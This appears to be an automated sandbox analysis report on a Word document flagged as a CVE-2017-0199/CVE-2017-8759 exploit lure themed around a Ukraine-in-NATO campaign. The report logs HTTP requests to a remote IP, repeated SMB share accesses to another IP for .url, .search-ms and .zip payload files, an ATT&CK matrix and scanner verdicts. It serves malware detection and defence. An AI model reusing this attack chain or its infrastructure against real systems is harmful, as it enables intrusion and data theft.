Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://onedrive.live.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://onedrive.live.com/embed?
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://otelrules.azureedge.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://outlook.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://outlook.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://outlook.office365.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://outlook.office365.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://pages.store.office.com/review/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://powerlift.acompli.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://pushchannel.1drv.ms
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://settings.outlook.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://staging.cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://tasks.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://wus2.contentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://www.yammer.com
Source: global traffic HTTP traffic detected: GET /MSHTML_C7/start.xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 74.50.94.156 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /MSHTML_C7/RFile.asp HTTP/1.1 Accept: */* Referer: http://74.50.94.156/MSHTML_C7/start.xml Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 74.50.94.156 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 74.50.94.156 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 74.50.94.156 Connection: Keep-Alive Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
Source: global traffic HTTP traffic detected: GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_4f657_ HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 74.50.94.156 Connection: Keep-Alive Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP

System Summary

barindex
Source: afchunk.rtf, type: SAMPLE Matched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
Source: afchunk.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc ReversingLabs: Detection: 29%
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc Virustotal: Detection: 49%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Source: BB84B4FE.url.0.dr OLE indicator, Word Document stream: true
Source: file001.url.0.dr OLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{ECAE2491-9D93-48FA-9079-8B02E3BA5F98} - OProcSessId.dat
Source: classification engine Classification label: mal72.spyw.evad.winDOC@3/41@0/2
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.dr OLE document summary: edited time not present or 0
Source: BB84B4FE.url.0.dr OLE document summary: title field not present or empty
Source: BB84B4FE.url.0.dr OLE document summary: edited time not present or 0
Source: file001.url.0.dr OLE document summary: title field not present or empty
Source: file001.url.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000

Stealing of Sensitive Information

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\PIPE\srvsvc
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\SHARE1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\PIPE\wkssvc
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\ex001.url
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.htm
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-ms
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zip
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htm
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: \\104.234.239.26\share1\
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\SHARE1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\ex001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
ATT&CK matrix, listed per tactic in the original row order (the counts shown in the matrix cells are kept in parentheses):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Exploitation for Client Execution (2); Scheduled Task/Job; At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (1); Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Network Share Discovery (2); Virtualization/Sandbox Evasion (1); File and Directory Discovery (1); System Information Discovery (2)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (11); Ingress Tool Transfer (1); Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud
Source | Detection | Scanner | Label
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc | 30% | ReversingLabs | Win32.Exploit.CVE-2017-0199
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc | 49% | Virustotal |
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc | 100% | Avira | EXP/CVE-2017-0199.Gen
No Antivirus matches
Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
